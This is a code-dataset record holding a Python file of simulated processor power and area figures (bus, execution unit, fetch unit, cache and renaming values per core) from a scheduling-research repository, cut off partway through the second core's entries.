hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
332fce88e3fcd65f6325e55d5249c02ec7bf79df | 68,619 | py | Python | benchmarks/SimResults/combinations_spec_mylocality/oldstuff/cmp_bwavesgcccactusADMastar/power.py | TugberkArkose/MLScheduler | e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061 | [
"Unlicense"
] | null | null | null | benchmarks/SimResults/combinations_spec_mylocality/oldstuff/cmp_bwavesgcccactusADMastar/power.py | TugberkArkose/MLScheduler | e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061 | [
"Unlicense"
] | null | null | null | benchmarks/SimResults/combinations_spec_mylocality/oldstuff/cmp_bwavesgcccactusADMastar/power.py | TugberkArkose/MLScheduler | e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061 | [
"Unlicense"
] | null | null | null | power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.167126,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.333957,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 1.04302,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.430183,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.744921,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.427233,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.60234,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.265308,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 7.18174,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.197049,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0155945,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.169625,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.115331,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.366674,
'Execution Unit/Register Files/Runtime Dynamic': 0.130925,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.455669,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 1.18149,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 3.65408,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000625916,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000625916,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000548335,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000213999,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00165673,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.0034569,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00588823,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.11087,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 6.43323,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.282868,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.376566,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.96874,
'Instruction Fetch Unit/Runtime Dynamic': 0.779649,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0860855,
'L2/Runtime Dynamic': 0.0203406,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 5.76953,
'Load Store Unit/Data Cache/Runtime Dynamic': 2.20082,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.146634,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.146634,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 6.46479,
'Load Store Unit/Runtime Dynamic': 3.0706,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.361575,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.72315,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.128324,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.129554,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.399995,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0465595,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.780341,
'Memory Management Unit/Runtime Dynamic': 0.176113,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 28.0434,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.687461,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0302696,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.211375,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.929105,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 8.62989,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0394701,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.23369,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.226856,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.114158,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.184132,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.0929436,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.391233,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.095782,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.40205,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0428579,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00478828,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0488448,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0354123,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0917027,
'Execution Unit/Register Files/Runtime Dynamic': 0.0402006,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.112772,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.284281,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.35478,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000594406,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000594406,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000538916,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000220213,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.0005087,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00223643,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00494203,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
